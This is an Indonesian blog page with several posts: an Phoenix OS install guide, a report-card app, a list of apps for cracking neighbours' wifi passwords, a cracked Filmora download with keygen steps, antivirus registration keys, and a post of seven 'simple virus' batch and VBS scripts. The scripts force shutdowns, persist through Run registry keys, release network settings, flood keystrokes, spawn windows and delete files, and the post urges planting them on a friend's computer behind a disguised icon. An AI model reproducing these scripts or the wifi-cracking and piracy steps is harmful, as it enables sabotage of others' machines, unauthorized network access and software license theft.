Friday, August 31, 2018

Download dan Instal Android PHOENIX OS untuk PC tanpa Emulator

Posted by DEDE KURNIAWAN on 8/31/2018 01:35:00 PM

Ada banyak pengguna smartphone di dunia dan faktanya orang-orang menghabiskan waktu lebih banyak dengan ponsel ketimbang PC. Nah, smartphone Android adalah termasuk yang paling banyak dipakai menempati urutan pertama. Meski diterpa banyak isu, performa Android tak pernah sedikit pun mengecewakan. Bahkan kini Android sudah dikembangkan agar dapat berjalan pada sistem komputer, pengembangan tersebut dinamakan Android-x86 Project.



Saat ini proyek Android-x86 Project telah melahirkan OS baru yang lebih stabil, khusus untuk perangkat komputer dekstop yang user-friendly, OS tersebut bernama Phoenix OS. Nah, dilansir dari situs makeusof, kali ini Jaka akan menjelaskan kepada kalian cara menginstal Phoenix OS di PC dan Laptop dengan mudah. Yuk, simak uraiannya di bawah ini.

Syarat Sebelum Instal Android Phoenix OS

1 Hardware Requirements

Phoenix OS membutuhkan prosesor x86 agar bisa berjalan lancar, baik buatan Intel atau AMD. Namun yang paling direkomendasikan adalah prosesor Intel Atom. Berikut ini adalah minimum hardware requirement yang dibutuhkan.

Kapasitas Storage minimal 2GB.
Prosesor Intel atau AMD buatan tahun 2012 ke atas. Lebih direkomendasikan prosesor Intel Atom.
USB Flash Drive 8GB (Untuk Media Booting Phoenix OS).
USB Flash Drive 1GB (Untuk GParted)

2. UEFI Atau BIOS Motherboard?

Sistem komputer lawas buatan 2010 dan di bawahnya masih memakai sistem I/O BIOS sebagai Power On Self Test (POST). Jadi sebelum komputer masuk ke sistem operasi, maka akan dicek terlebih dahulu oleh BIOS beberapa komponen hardware yang terpasang, sehingga mustahil sistem operasi dapat bekerja tanpa adanya BIOS. Namun, kini sistem komputer yang terbaru menggantikan BIOS dengan teknologi baru bernama Unifed Extensible Firmware Interface (UEFI), teknologi ini diklaim lebih handal dan lebih aman dibandingkan BIOS.

Sayangnya, Phoenix OS tidak support dengan sistem UEFI. Namun, jangan khawatir karena kita bisa mengonfigurasi UEFI agar bisa bekerja dengan sistem operasi Non-Windows. Yuk, teruskan membacanya ya.

Download Phoenix OS

SOFTWARE APLIKASI RAPORT K13 SD, SMP, SMA, SMK, MTs, MI dan MA EDISI REVISI TERBARU

Posted by DEDE KURNIAWAN on 8/31/2018 01:23:00 PM

Pada kesempatan ini saya akan posting tentang aplikasi raport kurilum 2013 terbaru sesuai dengan permendikbud 23 tahun 2016 revisi. Aplikasi ini merupakan pengembangan dari PEREMNDIKBUD versi sebelumnya. mudah-mudahan dengan adanya aplikasi ini dapat membantu mempermudah proses penilaian di sekolah terutama oleh para guru-guru dan wali kelas. Aplikasi ini di rancang sesuai dengan PEREMNDIKBUD  23 tahun 2016 revisi terutama dalam hal penentuan Deskripsi dan nilai predika yang berbeda-beda sesuai dengan KKM yang di input.

Aplikasi ini pengembangan dari aplikasi Raport K13 sebelumnya, deskripsi yang digunakan dalam aplikasi ini haruslah terlebih dahulu dibuat oleh guru pengajar untuk setiap nilai mata pelajaran. Setelah deskripsi siap dibuat, barulah kemudian Microsoft Office Excel secara otomatis menentukan deskripsi yang cocok sesuai dengan nilai yang diperoleh oleh peserta didik.

kami sampaikan terima kasih kepada yang sudah menggunakan aplikasi ini atas saran dan masukan serta koreksiannya sehingga aplikasi terus bisa dikembangan dan di update. Selain itu kami juga sangat berterima kasih atas peran aktif pengguna yang berkenan untuk saling membantu dalam penggunaan aplikasi maupun tentang Kurikulum 2013



Fitur dalam Aplikasi Rapot
1. Tampilan sangat elegan dan menarik
2. mudah di operasikan / di pahami
3. bisa Upload Logo
4. ada pilihan KOP SURAT
5. bisa SAVE AS PDF
6. lengkap dengan Data LEGER
7. Auto Hide Kolom, bagi Mapel MULOK, Prestasi, dll
8. dan masih banyak algi Fitur-fitur yang menjadikan pelengkap aplikasi.
9. Bisa di custome format, seperti  penambahak kolom Mapel, Ekskul, Prestasi, dll (biasanya bagi sekolah-sekolah berbasis Bourding / Pondok Pesantren)
10. Aplikasi Raport ini bisa di gunakan untuk Kelas 1- 3 (kelas 6 untuk SD), lengkap semester 1 dan semester 2.
11. Fitur Update terbaru ada tambahan Menu BUKU INDUK
Langsung saja pilih dan downlaoad sesuai dengan kebutuhannya
  1. Jenjang Madrasah
2. Jenjang Sekolah

selengkapnya bisa cek kunjungi laman https://rapotkurtilas.blogspot.com

Saturday, August 19, 2017

Download Software Hack Password Wifi Android | 5 Aplikasi Pembobol wifi terbaik

Posted by DEDE KURNIAWAN on 8/19/2017 09:22:00 AM

Pada masa modern sekarang ini, menjelajah dan bermain didunia internet memang membutuhkan jaringan internet yang stabis, karena jika koneksi kita tersendat-sendat atau bahkan tidak bisa terhubung maka aktivitas kita pasti akan terganggu dan akan membuat kita kadangkala marah akan kejadian itu. Nah disitulah fungsi android untuk melancarkan aktivitas kita didunia internet adalah dengan terhubung ke koneksi wifi. Kenapa? Karena jaringan wifi merupakan jaringan yang paling stabil saat ini.
 
Nah, dengan jaringan wifi tersebut, hal apapun yang dilakukan didunia maya tidak akan terganggu. Tetapi sayangnya, masih belum semua orang bisa memiliki jaringan wifi hotspot, karena sampai sekarang pun masih segelintir orang yang mempunyai jaringan wifi dirumahnya. Kendala pertama yang saya sendiri juga merasakan adalah biaya yang cukup mahal untuk memasang jaringan wifi, apalagi jika rumah kita jauh dari kota dan belum terjangkau kabel telkom.

Perkembangan teknologi yang sangat cepat ini membuat internet cepat dan stabil menjadi kebutuhan pokok bagi setiap warga dunia maya, agar aktivitas yang berhubungan dengan internet berjalan lancar. Koneksi wifi merupakan salah satu solusi agar koneksi internet bisa lebih cepat dan stabil. Namun kebanyakan koneksi wifi di tempat umum selalu terkunci menggunakan password.
Memang bagi kita pengguna android yang membutuhkan koneksi internet hanya untuk aktivitas streaming, browsing, download, dan sosmed, untuk berlangganan wifi memang cukup berat membayar tagihan bulanan jika kita tidak mendapatkan uang dari internet. Karena kebanyakan pelanggan internet wifi adalah pengguna yang memiliki bisnis online atau internet marketing yang bisa menghasilkan uang dari internet, akan sangat membutuhkan koneksi lancar yaitu dengan memasang wifi.
Jangan risau bagi kamu yang ingin mendapat gratisan, nah disini peran penting aplikasi ketiga untuk mengetahui password wifi tetangga kamu. Aplikasi pembobol password wifi yang akan saya bahas tentunya free/gratis, dan sangat mudah untuk dipahami.

5 Aplikasi Pembobol Password Wifi Android Terbaik & Terbaru

Pasti kamu sudah penasaran dengan aplikasi tersebut. Untuk itu silahkan simak baik-baik ulasang yang saya berikan berikut.

#1. Wifi Master Key

 
Dari urutan pertama dari 5 rekomendasi aplikasi pembobol wifi adalah Wifi Master Key. Aplikasi ini memiliki banyak fitur untuk mempermudah pengguna dalam melakukan hack password Wifi. Untuk reputasi, aplikasi ini cukup dikenal banyak pengguna smartphone android, karena rating jumlah pengunduh juga besar. Maka dari itu langsung saja kamu kunjungi playstore dan coba aplikasi ini, kamu bisa mendownloadnya (disini).

#2. Wifi Hacker Profesional

Aplikasi Wifi Hacker Profesional memiliki fitur yang lebih userfriendly atau lebih mudah dimengerti oleh orang awam, sehingga kamu akan lebih cepat membuka password wifi yang kamu retas itu. Oleh karena itu aplikasi ini sangat saya rekomendasikan sebagai aplikasi pembobol password paling mudah dan jitu, jika kamu ingin mendownloadnya silahkan klik link (disini).

#3. Router Keygen

Di urutan ke 3, aplikasi yang saya rekomendasikan adalh Router Keygen. Dimana aplikasi ini sangat cocok untuk kamu pengguna gadget android, sama seperti kedua aplikasi diatas yang sudah saya jelaskan. Aplikasi ini juga memiliki fitur yang sangat mudah untuk kamu gunakan, jika kamu tertarik ingin mencobanya silahkan download (disini).

#4. Wifi Password Hacker Prank


Wifi Password Hacker Prank merupakan aplikasi pembobol password wifi yang cukup mudah dan efektif saat digunakan. Pada playstore aplikasi ini memiliki rating yang baik, yah terbukti dengan 50 juta yang sudah mendownload dan mencobanya di seluruh dunia, langsung saja download aplikasinya (disini).

#5. Wifi Unlocker  

Aplikasi yang terakhir saya rekomendasikan adalah Wifi Unlocker. Aplikasi ini tergolong sangat handal untuk mengakses keamanan wifi kamu sendiri. Penggunaan aplikasi ini juga tergolong sangat mudah dan ramah digunakan untuk semua umur. Kamu hanya tinggal memilih nama router yang ingin kamu retas passwordnya. Setelah itu akan muncul proses scanning dan kamu tinggal menunggu di layar smartphone android kamu akan menampilkan password wifi tersebut, silahkan untuk mendownloadnya (disini).

Monday, June 19, 2017

Download Software Wondershare Filmora 8.2.3.1 Full Version Terbaru

Posted by DEDE KURNIAWAN on 6/19/2017 11:47:00 AM



Wondershare Filmora full keygen merupakan update terbaru 2017 full version yang telah rilis baru-baru ini, software edit video yang sudah sangat terkenal ini telah menyita banyak perhatian dari para pecinta video editing, ini tak lepas dari berbagai fitur lengkap yang telah disediakan sehingga sangat memudahkan para pengguna untuk melakukan edit video meskipun anda adalah seorang pengguna awam sekalipun.
Dengan menggunakan Wondershare Filmora terbaru full version anda bisa mengabadikan mmomen bahagian yang anda jalani bersama keluarga dan menjadikannya sebuah momen yang tak terlupakan, tuangkan ide kreatif anda dalam melakukan editing video koleksi yang anda miliki untuk menjadikan video tersebut menjadi sebuah video yang indah dan menyenangkan dengan berbagai efek yang bisa anda gunakan dan telah disediakan oleh filmora.
Setelah hasil editing video kreasi anda telah selesai, silahkan share kepada teman anda via media sosial seperti facebook, twitter dan lainnya dan mintalah komentar mereka tentang video yang anda upload tersebut, anda juga bisa upload video di youtube agar orang lain diseluruh dunia bisa menikmati hasil karya fantastis tersebut. Di blog ini anda bisa download Wondershare Filmora 8 Full Version with keygen gratis untuk anda pengunjung setia blog ini.


Fitur Wondershare Filmora Terbaru
1.    Menambahkan pesan teks animasi pada video
2.    Menambahkan soundtrack kedalam video
3.    Menambahkan Motion grapics yang sangat mengesankan
4.    Tersedia ratusan visual effec untuk mempercantik video
5.    Mempercepat dan memperlambat video
6.    Share video hasil kreasi anda kepada teman dan saudara via media sosial
7.    Upload video anda ke youtube dengan mudah
Dan tentunya tak sebatas itu saja fitur keren yang bisa anda dapatkan pada Wondershare Filmora terbaru 2017 versi 8 full version, untuk bisa mengetahui semua fitur dan manfaatnya silahkan download dan install filmora terbaru 2017 pada komputer anda dan gunakan imajinasi anda untuk membuat sebuah video yang menarik, atraktif dengan berbagai effect yang disediakan didalam program.
Cara Install dan aktivasi Filmora 8
§  Download Filmora dan ekstrak filenya
§  Uninstall versi lama jika ada
§  Install program sampai selesai
§  Selesai install jangan dijalankan dulu programnya
§  Sekarang buka folder cracked dan jalankan block host.exe
§  Setelah itu jalankan keygen dan klik generate
§  Gunakan informasi yang disediakan keygen untuk aktivasi
§  Selesai
Download via Dailyuploads / Userscloud
Bagi anda yang suka melakukan editing video professional, anda pasti membutuhkan software Wondershare Filmora 8.2.3.1 full version yang akan membantu anda membuat sebuah video yang sangat menarik, program memiliki fitur yang cukup lengkap untuk berbagai kebutuhan melakukan editing video dan pastinya sangat mudah digunakan, tak membutuhkan keahlian khusus untuk bisa menggunakan software ini, yang pasti kreatifitas anda menentukan hasil editing yang ada lakukan.

Tuesday, May 16, 2017

Download Antivirus SMADAV 2017 versi 11.4 || mencegah Virus RANSOMWARE atau WANNACRY

Posted by DEDE KURNIAWAN on 5/16/2017 09:57:00 AM


Smadav 2017 Rev. 11.4 dirilis !!

 Lagi hangatnya pemberitaan tentang Virus RANSOMWARE atau WANNACRY. Beberapa hari ini Indonesia menjadi salah satu korban serangan cyber, beberapa rumah sakit di Jakarta diserang oleh ransomware yang bernama WannaCry atau dikenal juga sebagai WannaCrypt. Ransomware adalah virus komputer yang menginfeksi komputer melalui jaringan internet atau lokal, kemudian mengunci komputer beserta file-file yang ada di dalamnya hingga tidak dapat dibuka atau diakses.




seperti gambar diatas adalah tampilah serangan VIRUS WANNACRY yang mengunci file dokumen (encrypted files).

Wah, nggak terbayang yah Sahabat, jika file-file skripsi kamu mendadak tak bisa diakses. Mimpi buruk semua mahasiswa deh!  untuk menjaga agar datamu tetap aman dari serangan-serangan cyber dan kegagalan hardware yang bisa bikin kamu lebih galau dari diputusin pacar.

kini telah hadir versi RIlis terupdate dari Smadav 2017 Rev. 11.4 dirilis, dengan penambahan database di setiap versinya.

Smadav 2017 Rev. 11.4 :
+ Penambahan database 404 virus,
+ Peningkatan kemampuan Anti-Ransomware untuk pencegahan Ransomware (WannaCry 1 dan Wanna-Cry 2.0),
+ Penggunaan resource CPU lebih ringan saat proteksi aktif,
+ Perbaikan kesalahan program (bug) dan kesalahan deteksi.


Smadav 2017 Rev. 11.3.5 :
+ Penambahan database 1038 virus,
+ Peningkatan kecepatan scanning harddisk/USB Flashdisk,
+ Penambahan fitur pengaturan Anti-Ransomware untuk mencegah terinfeksi virus penyandera data,
+ Perbaikan pada tampilan dan bahasa Smadav 2017,
+ (11.3.5) Perbaikan kesalahan program (bug) dan kesalahan deteksi


Smadav 2017 Rev. 11.2 :
+ Desain tampilan baru Smadav 2017,
+ Penambahan database 1040 virus baru,
+ Penambahan mode cepat untuk scan otomatis USB Flashdisk lebih cepat,
+ Penambahan teknologi proteksi untuk mencegah Ransomware,
+ (Rev. 11.2) Penyempurnaan dan perbaikan fitur-fitur Smadav 2017.


Smadav 2016 Rev. 11.0.4 :
+ Penambahan database 220 virus baru,
+ Penambahan Fitur baru (USB Anti-Exe) untuk memblokir program tidak dikenal di USB Flashdisk,
+ Peningkatan proteksi untuk mencegah Ransomware khususnya Cerber3 dan Cerber4,
+ (Rev. 11.0.4) Startup lebih cepat dan perbaikan bug explorer,
+ dan penyempurnaan lainnya.


Smadav 2016 Rev. 10 :
+ Anti-Ransomware sebagai pencegahan untuk virus penyandera data (Cerber, Locky, Teslacrypt, dll.),
+ Penambahan fitur Scan Total untuk membersihkan yang virus belum dikenali,
+ Fitur otomatis mengembalikan file tersembunyi di flashdisk,
+ Penyempurnaan proteksi USB dan Browser,
+Support untuk Windows 10 (Smadav dapat digunakan di Windows XP/Vista/7/8/10),
+ dan banyak penyempurnaan lainnya.






 




Tittle : Smadav 2017 Rev 11.4
Filename : smadav2017 rev42.exe
File size : 1.5MB
Requirements : Windows XP / Vista / 2000 / Windows 7 / Windows 8
Languages : Multiple languages
License : Freeware
Author : Smadav

1. Tipe Personal
     Nama : masteryabika.blogspot.com
     Key    : 081300146206

2. Tipe Warnet
     Nama : masteryabika.blogspot.com
     Key    : 771277146206

3. Tipe Perusahaan
     Nama : masteryabika.blogspot.com
     Key    : 991299146206


Agar anda bisa mengoperasikan Smadav dengan mudah, tentunya anda perlu untuk mengetahui berbagai macam tools yang bisa anda operasikan. Beberapa alat yang ada padanya diantaranya adalah One Virus by User. Apabila anda menemukan sebuah file yang dicurigai sebagai salah satu virus, maka anda bisa memasukkan file tersebut sebagai virus melalui fitur One Virus by User ini. Silahkan download aplikasi antivirus ini karena dengan menggunakan fitur ini Smadav kemudian akan mendeteksi secara otomatis dan langsung membersihkan PC tersebut pada komputer anda. Selain dari fitur tersebut ada juga Proccer Manager, Dengan menggunakan fitur ini anda bisa melihat berbagai proses yang sedang berjalanpada Windows. Untuk fungsi ini mungkin tidak jauh berbeda dengan Task Manager yang bisa digunakan untuk memonitor seluruh kegiatan atau aktivitas yang sedang berjalan. Tidak cuma itu saja, masih ada juga sistem editor yang bisa digunakan untuk mengubah dan melakukan konfogurasi sistem. Adapun yang terakhir adalah Win force, dan ia merupakan sebuah fitur yang sangat sederhana yang mengharuskan untuk menjalankan sebuah fungsi windows task manager, registry editor, system configuration utility dan command prompt. 


Karakteristik Rasomware WannaCry

Berikut link yang dapat Anda tuju untuk mengetahui identitas Ransomware WannaCry: https://www.virustotal.com/en/file/b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25/analysis/

Friday, April 28, 2017

7 Script Hacking Membuat Virus Sederhana dengan Notepad

Posted by DEDE KURNIAWAN on 4/28/2017 10:19:00 AM


Siapa sih yang tidak takut dengan virus di komputer? Saat komputer terkena virus, maka besar kemungkinan komputer kamu jadi tidak bisa digunakan. Apalagi jika komputer kamu kena salah satu dari 20 virus komputer paling berbahaya di dunia. Tamat sudah, antara harus beli komputer baru atau install ulang.
Di balik seramnya serangan virus komputer, maka JalanTikus berikan kamu kumpulan script hacker untuk membuat virus komputer sederhana. Mau nggak? Biar kelihatan pintar kayak hacker profesional gitu. Simak 7 script hacking membuat virus sederhana dengan notepad.

7 Script Hacking Membuat Virus Sederhana

Sudah tahu virus komputer itu berbahaya, kok JalanTikus bagikan cara membuat virusnya sih? Ya karena virus komputer yang JalanTikus bagikan ini cuma berisi script sederhana yang akan mengacaukan fungsi komputer tanpa merusak hardware atau membocorkan informasi yang ada di dalamnya. Jadi aman dan cocok untuk digunakan menjahili komputer teman kamu.

1. Membuat Virus Shutdown

Cara kerja virus komputer sederhana ini adalah dengan memaksa komputer teman atau target jadi Shutdown. Untuk melakukannya, silakan buka Notepad, dan copy paste kode di bawah. Lalu save file-nya dengan nama ForceShutdown.bat dan type file-nya All file.
  1. @echo off
  2. msg * I don't like you
  3. shutdown -c "Error! Komputer kamu terpaksa harus Shutdown!" -s
Untuk mengaktifkan virus ini, kamu harus klik 2 kali pada file-nya. Maka, secara otomatis virus ini akan berjalan.

2. Paksa Shutdown Setiap Kali Dinyalakan

Berbeda dengan virus sebelumnya, virus sederhana yang ini akan memaksa komputer teman kamu untuk Shutdown setiap kali dinyalakan. Eits, jangan asal gunakan virus ini kalo gak siap tanggung akibatnya ya!
  1. echo @echo off>c:windowshartlell.bat
  2. echo break off>>c:windowshartlell.bat
  3. echo shutdown -r -t 11 -f>>c:windowshartlell.bat
  4. echo end>>c:windowshartlell.bat
  5. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
  6. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
  7. echo You have been HACKED.
  8. PAUSE
Simpan file buatan kamu di atas dengan nama apapun. Jangan lupa gunakan ekstensi .bat ya! Lalu klik untuk mengaktifkannya.

3. Mematikan Internet Secara Permanen

Saat berada di suatu jaringan internet, pasti kesal dong jika ada orang yang malah download? Bikin internet lemot karena bandwith berkurang cepat. Makanya, coba matikan internet teman kamu menggunakan script virus sederhana berikut:
  1. echo @echo off>c:windowswimn32.bat
  2. echo break off>>c:windowswimn32.bat
  3. echo ipconfig/release_all>>c:windowswimn32.bat
  4. echo end>>c:windowswimn32.bat
  5. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
  6. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  7. echo You Have Been HACKED!
  8. PAUSE
Seperti biasa, simpan dengan nama apapun dan gunakan ekstensi .bat. Lalu klik untuk mengaktifkannya!

4. Virus Caps Lock

Siapa yang tidak kesal jika ada orang ngetik isinya huruf besar semua? Orang yang menerima pesan dengan huruf besar semua jelas akan merasa terganggu, atau bahkan marah. Makanya, yuk isengin teman kamu dengan membuat tombol Caps Lock-nya nyala terus menggunakan script virus sederhana berikut:
  1. Set wshShell =wscript.CreateObject("WScript.Shell")
  2. do
  3. wscript.sleep 100
  4. wshshell.sendkeys "{CAPSLOCK}"
  5. loop
cara-membuat-virus-sederhana-dengan-notepad-4
Copy dan paste kode di atas ke Notepad, lalu simpan dengan nama file ForceCapsLock.vbs dan type file-nya All file. Klik 2 kali untuk mulai mengaktifkan virus komputer sederhana ini.

5. Virus Alay

Siapa bilang cuma anak muda kekinian doang yang bisa alay? Komputer kamu juga bisa alay loh kalo terinspeksi virus keyboard alay. Nah, untuk membuat virus komputer yang akan membuat keyboard jadi alay, kamu bisa gunakan script berikut:
  1. Set wshShell =wscript.CreateObject("WScript.Shell")
  2. do
  3. wscript.sleep 100
  4. wshshell.sendkeys "{CAPSLOCK}"
  5. wscript.sleep 100
  6. wshshell.sendkeys "{NUMLOCK}"
  7. wscript.sleep 100
  8. wshshell.sendkeys "{SCROLLLOCK}"
  9. loop
cara-membuat-virus-sederhana-dengan-notepad-3
Caranya sama, copy dan paste kode di atas ke Notepad. Lalu save dengan nama ForceAlay.vbs dan type file All file.
Cara Membuat Virus Komputer Sederhana Berikut Solusinya (Part 3)

6. Virus Orang Jelek

Dikatain jelek itu emang nyebelin. Kalo cuma sekali dua kali sih harusnya masih bisa ditahan, tapi kalo terus-terusan ngatain jelek gimana coba? Nah, dengan kode di bawah ini, kamu bisa membuat sebuah virus komputer sederhana yang akan memaksa komputer target untuk mengeluarkan alert bahwa 'dia jelek' tanpa henti.
  1. Set wshShell = wscript.CreateObject("WScript.Shell")
  2. do
  3. wscript.sleep 100
  4. wshshell.sendkeys "Muka Lu Jelek Kayak Komputer Lu"
  5. loop
cara-membuat-virus-sederhana-dengan-notepad-1
Copy dan paste script virus sederhana di atas ke Notepad. Oh iya, kamu bisa ganti bagian warna merah dengan kata-kata sesuai selera, lalu save dengan nama VirusOrangJelek.vbs.

7. Virus Kuis

Semua orang suka kuis apalagi kalo berhadiah. Tapi kamu bakal kesal deh pasti kalo setiap kali mau buka komputer, ternyata yang nongol adalah kuis. Ya kan? Buat kamu yang mau isengin komputer target dengan kuis-kuis menyebalkan, coba kamu gunakan script berikut:
  1. @echo off
  2. title Kuis hari ini!
  3. :menu
  4. cls
  5. echo Jika kamu kena virus apa yang kamu lakukan?
  6. pause
  7. echo pilih yang mana:
  8. echo 1. Matiin komputer
  9. echo 2. Format aja
  10. echo 3. Nangis
  11. echo 4. Beli komputer baru
  12. set input=nothing
  13. set /p input=Choice:
  14. if %input%==1 shutdown -s -t
  15. 30
  16. if %input%==2 del c:xxx
  17. if %input%==3 @ECHO off
  18. msg * Muka lu jelek
  19. msg * Ngaca dulu gih!
  20. msg * Hayo lu, CPU lu gw acak-acak ya
  21. msg * Udah, install ulang aja
  22. msg * Mau kelar kan masalahnya?
  23. @ECHO off
  24. :top
  25. START %SystemRoot%
  26. system32notepad.exe
  27. GOTO top
cara-membuat-virus-sederhana-dengan-notepad-2
Copy dan paste deh ke Notepad dengan nama ViruzQuiz.bat. Selesai, tinggal jalankan untuk mengujinya.
Agar berjalan lancar, coba simpan file virus komputer sederhana yang kamu buat di komputer target. Lalu letakkan file tersebut di desktop, dan jangan lupa ubah ikon shortcut-nya jadi aplikasi favorit target.
Mudah, bukan? Selamat mencoba!

Daftar Post Terpopuler

RANDOM POST's

Related Posts Plugin for WordPress, Blogger...
  • RSS
  • Delicious
  • Digg
  • Facebook
  • Twitter
  • Linkedin

Search Site